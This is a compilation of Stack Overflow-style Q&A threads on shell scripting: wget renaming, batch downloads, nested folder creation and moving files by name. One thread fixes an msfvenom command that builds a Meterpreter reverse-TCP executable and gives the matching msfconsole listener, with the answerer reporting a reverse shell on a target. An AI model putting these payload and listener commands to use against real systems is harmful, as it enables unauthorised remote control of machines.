wget - specify directory and rename the file

I'm trying to download multiple files and need to rename them as I download. How can I do that and specify the directory I want them downloaded to? I know I need to be using -P and -O for this, but it does not seem to be working for me.

OK, it's too late to post my answer here, but I'll correct @Bill's answer.
If you read "man wget" you will see the following synopsis:
...
wget [option]... [URL]...
...
That is, options come before the URL, so
wget -O /directory_path/filename.file_format https://example.com
is the form that aligns with the wget documentation.
Remember: Just because it works doesn't mean it's right!
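Conversely, if you only want to choose the directory and keep the server's filename, -P (--directory-prefix) alone does that; for example, with a hypothetical URL:
wget -P /directory_path https://example.com/original-filename
When -O is given a full path, as above, -P is not needed at all.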

I ran into a similar situation and came across your question. I was able to get what I needed by writing a little bash script that parsed a file with URLs in the first column and the desired name in the second.
This is the script I used for my particular requirement. Maybe it will give you some guidance if you still need help.
#!/bin/bash
# Each line of $FILE holds a URL in column 1 and a target name in column 2
FILE=URLhtmlPageWImagesWids.txt
while read -r F1 F2
do
wget -r -l1 --no-parent -A.jpg -O "$F2.jpg" "$F1"
done < "$FILE"
Actually, this won't work, because with -r, -O concatenates all of the results into one file.
You could try the --no-directories or --cut-dirs switches instead, and then rename the downloaded files in a second loop.
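A minimal sketch of that two-pass approach, assuming the same two-column input file as above (URL in column 1, name in column 2; the scratch-folder naming is my own invention):
#!/bin/bash
# Pass 1: download into a scratch folder per entry; -nd (--no-directories)
# stops wget from recreating the remote directory tree
while read -r url name; do
wget -r -l1 --no-parent -nd -A.jpg -P "tmp_$name" "$url"
# Pass 2: rename the fetched images using the second column
i=0
for f in "tmp_$name"/*.jpg; do
[ -e "$f" ] || continue   # skip if nothing matched
mv "$f" "${name}_$((i+=1)).jpg"
done
rmdir "tmp_$name"
done < URLhtmlPageWImagesWids.txt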

wget your_url -O your_directory/your_filename

Like Bill was saying,
wget http://example.com/original-filename -O /home/new_filename
worked for me!
Thanks

This may work for everyone:
mkdir Download1
wget -O "Download1/test 10mb.zip" "http://www.speedtest.com.sg/test_random_10mb.zip"
You need to put quotes ("") around a name that contains a space.

I'm a little late to the party, but I just wrote a script to do this. You can check it out here: bulkGetter

Related

How can I download an array of files from a website? wget?

Let's say I want to download example.com/pics/0000.jpg through example.com/pics/9999.jpg.
What's the best way to do that?
I tried:
wget example.com/pics/{0000..9999}.jpg
but it said "Argument list too long".
What's a good script or program I can use to do this?
I don't code much. I am thinking it will involve a shell script that uses wget to get 0000.jpg and then adds 1 to get the next picture, until it reaches 9999.jpg.
Thanks.
Here's a Bash one-liner that does what you want:
for n in $(seq -f "%04g" 0 9999); do wget "http://example.com/pics/$n.jpg"; done
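If you have curl available, its built-in URL globbing can do the same without a shell loop; the bracket range preserves the leading zeros:
curl -O "http://example.com/pics/[0000-9999].jpg"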

Custom Payload Kali Linux

root@kali:~# msfvenom windows/meterpreter/reverse_tcp LHOST=192.168.49.128 LPORT=12345 -f exe
Attempting to read payload from STDIN...
You must select an arch for a custom payload
I've been googling for some time now, with no positive result.
Can anyone tell me what is meant by 'You must select an arch for a custom payload'?
If you run msfvenom -h it will bring up the help. You will see that the option to set the architecture is -a, which you need to set to x86 or whichever architecture you want. You also need to actually specify the payload by putting -p in front of the payload name. So your command would look like:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.49.128 LPORT=12345 -a x86 -f exe > yourexploit.exe
It will complain that no platform was selected and that it chose one for you ("No platform was selected, choosing Msf::Module::Platform::Windows from the payload"), and then report "Found 0 compatible encoders"; just ignore that. Run file yourexploit.exe and it should print something like "PE32 executable", and then you're good to go. I just figured this out and it worked for me: I ran the .exe on my target and got a reverse shell. Good luck!
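For completeness, here is a sketch of the matching listener on the attacker side (adjust LHOST/LPORT to whatever you baked into the payload):
msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.49.128; set LPORT 12345; run"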
It looks like you copied the msfvenom command from the internet. In your command the -p is not an actual -p (it is a Unicode look-alike character); retyping the -p on your own keyboard should fix this.
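A quick way to confirm such a look-alike is to dump the pasted text as raw bytes; a genuine ASCII "-p" is hex 2d 70, while a Unicode dash shows up as a multi-byte sequence:
printf '%s' '-p' | od -An -tx1   # a real ASCII "-p" prints: 2d 70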

Downloading file from online database using bash script

I want to download some files from an online database, but it does not allow me to download all the files at once; instead, it offers one file per searched keyword. Because I have more than 20000 keywords, this is not feasible for me.
For example, I want to download the whole set of miRNA-mRNA interactions from SarBase, but it does not offer an option to download all of them at once.
I wonder how I can download them by writing a script. Can anybody help me?
Make a file called getdb.sh.
#!/bin/bash
echo "Download keywords in kw.txt."
# Fetch one result file per accession listed in kw.txt
for kw in $(cat kw.txt)
do
curl "http://www.mirbase.org/cgi-bin/get_seq.pl?acc=$kw" > "$kw.txt"
done
Create another file called kw.txt:
MI0000342
MI0000343
MI0000344
Then run this
$ chmod +x getdb.sh
$ ./getdb.sh
Download keywords in kw.txt.
$ ls -1 *.txt
kw.txt
MI0000342.txt
MI0000343.txt
MI0000344.txt
Another way:
cat kw.txt | xargs -I{} curl -o {}.txt "http://www.mirbase.org/cgi-bin/get_seq.pl?acc={}"
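If the server tolerates it, GNU xargs can also run several downloads in parallel via -P (keep the count small to be polite):
xargs -I{} -P 4 curl -s -o {}.txt "http://www.mirbase.org/cgi-bin/get_seq.pl?acc={}" < kw.txt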

Fastest way to create 1000 folders one inside another and put a file in the last folder

I've written code for searching for a specific file: the user enters a starting path and a filename, and the program prints the file's details if it exists, or prints "not found" otherwise.
The code is based on recursion. I want to test it with a large folder hierarchy, let's say 1000 folders, one inside the other, with a file called david.txt inside the 1000th folder.
How can I do that without spending the next 3 hours creating 1000 folders by hand?
The code is written in C, under Ubuntu.
Thanks
Type the following in your shell:
mkdir -p folder$( seq -s "/folder" 1000 )
Then you can enter this folder:
cd folder$( seq -s "/folder" 1000 )
and create a file:
touch david.txt
and come back to your previous dir:
cd -
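To check the result, count the directories in the chain; this should print 1000:
find folder1 -type d | wc -l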
As some comments described, I would use the shell for such purposes:
#!/bin/sh
# Create and descend into 1000 nested "tst" directories
for i in $(seq 1000)
do
mkdir tst
cd tst
done
# Drop the test file in the innermost directory
touch david.txt
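To throw the test tree away afterwards, run this from the directory where you launched the script; it removes the whole nested chain in one go:
rm -rf tst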
On a related topic, let me suggest this article, which shows how shell scripting can sometimes solve your problem in much less development time, especially for ad-hoc problems like this one.
Simple bash loop:
$ pushd .
$ for i in {1..1000}; do
mkdir d$i;
cd d$i;
done
$ touch david.txt
$ popd
Use (almost) the same code to create the folders and files. Once that is working, the searching/reporting is almost done as well. It's sort of self-testing :)

Moving things in terminal based on their name

Edit: I think this has been answered successfully, but I can't check 'til later. I've reformatted it as suggested though.
The question: I have a series of files, each with a name of the form XXXXNAME, where XXXX is some number. I want to move them all to separate folders called XXXX and have them called NAME. I can do this manually, but I was hoping that by naming them XXXXNAME there'd be some way I could tell Terminal (I think that's the right name, but not really sure) to move them there. Something like
mv *NAME */NAME
but where it takes whatever * matched in the first case and reuses it in the path.
This is on some form of Linux, with a bash shell.
In the real life case, the files are 0000GNUmakefile, with sequential numbering. I'm having to make lots of similar-but-slightly-altered versions of a program to compile and run on a cluster as part of my research. It would probably have been quicker to write a program to edit all the files and put in the right place in the first place, but I didn't.
This is probably extremely simple, and I should be able to find an answer myself, if I knew the right words. Thing is, I have no formal training in programming, so I don't know what to call things to search for them. So hopefully this will result in me getting an answer, and maybe knowing how to find out the answer for similar things myself next time. With the basic programming I've picked up, I'm sure I could write a program to do this for me, but I'm hoping there's a simple way to do it just using functionality already in Terminal. I probably shouldn't be allowed to play with these things.
Thanks for any help! I can actually program in C and Python a fair amount, but that's through trial and error largely, and I still don't know what I can do and can't do in Terminal.
SO many ways to achieve this.
I find that the old standbys sed and awk are often the most powerful.
ls | sed -rne 's:^([0-9]{4})(NAME)$:mv -iv & \1/\2:p'
If you're satisfied that the commands look right, pipe the command line through a shell:
ls | sed -rne 's:^([0-9]{4})(NAME)$:mv -iv & \1/\2:p' | sh
I put NAME in brackets and used \2 so that if it varies more than your example indicates, you can come up with a regular expression to handle your filenames better.
To do the same thing in gawk (GNU awk, the variant found in most GNU/Linux distros):
ls | gawk '/^[0-9]{4}NAME$/ {printf("mv -iv %s %s/%s\n", $1, substr($0,1,4), substr($0,5))}'
As with the first sample, this produces commands which, if they make sense to you, can be piped through a shell by appending | sh to the end of the line.
Note that with all these mv commands, I've added the -i and -v options. This is for your protection. Read the man page for mv (by typing man mv in your Linux terminal) to see if you should be comfortable leaving them out.
Also, I'm assuming with these lines that all your directories already exist. You didn't mention if they do. If they don't, here's a one-liner to create the directories.
ls | sed -rne 's:^([0-9]{4})(NAME)$:mkdir -p \1:p' | sort -u
As with the others, append | sh to run the commands.
I should mention that it is generally recommended to use constructs like for (in Tim's answer) or find instead of parsing the output of ls. That said, when your filename format is as simple as /[0-9]{4}word/, I find the quick sed one-liner to be the way to go.
Lastly, if by NAME you actually mean "any string of characters" rather than the literal string "NAME", then in all my examples above, replace NAME with .*.
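For reference, a find-based sketch of that recommended alternative, assuming the literal suffix NAME as in the examples above:
find . -maxdepth 1 -name '[0-9][0-9][0-9][0-9]NAME' | while read -r f; do
b=$(basename "$f")
mkdir -p "${b%NAME}"
mv -iv "$f" "${b%NAME}/NAME"
done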
The following script will do this for you. Copy the script into a file on the remote machine (we'll call it sortfiles.sh).
#!/bin/bash
# Get all files in the current directory having names XXXXsomename, where X is a digit
files=$(find . -name '[0-9][0-9][0-9][0-9]*')
# Build a list of the XXXX prefixes found in the list of files
# (cut -c 3-6 skips the "./" that find puts in front of each name)
dirs=
for name in ${files}; do
dirs="${dirs} $(echo ${name} | cut -c 3-6)"
done
# Remove redundant entries from the list of XXXX prefixes
# (uniq only drops adjacent duplicate lines, so split the list and sort it first)
dirs=$(echo ${dirs} | tr ' ' '\n' | sort -u)
# Create any XXXX directories that are not already present
for name in ${dirs}; do
if [[ ! -d ${name} ]]; then
mkdir ${name}
fi
done
# Move each XXXXsomename file into its directory, renaming it to somename
for name in ${files}; do
mv ${name} $(echo ${name} | cut -c 3-6)/$(echo ${name} | cut -c 7-)
done
# Return from script with normal status
exit 0
From the command line, do chmod +x sortfiles.sh
Execute the script with ./sortfiles.sh
Just open the Terminal application, cd into the directory that contains the files you want moved/renamed, and copy and paste these commands into the command line.
shopt -s extglob   # enable the extended *(...) glob patterns used below
for file in [0-9][0-9][0-9][0-9]*; do
dirName="${file%%*([^0-9])}"    # strip the trailing non-digit part, leaving XXXX
mkdir -p "$dirName"
mv "$file" "$dirName/${file##*([0-9])}"    # strip the leading digits, leaving NAME
done
This assumes all the files that you want to rename and move are in the same directory. The file globbing also assumes that there are at least four digits at the start of the filename. If there are more than four digits, they will still be caught, but not if there are fewer than four. If there are fewer than four, take off the appropriate number of [0-9]s from the for line.
It does not handle the case where "NAME" (i.e. the name of the new file you want) starts with a number.
See this site for more information about string manipulation in bash.
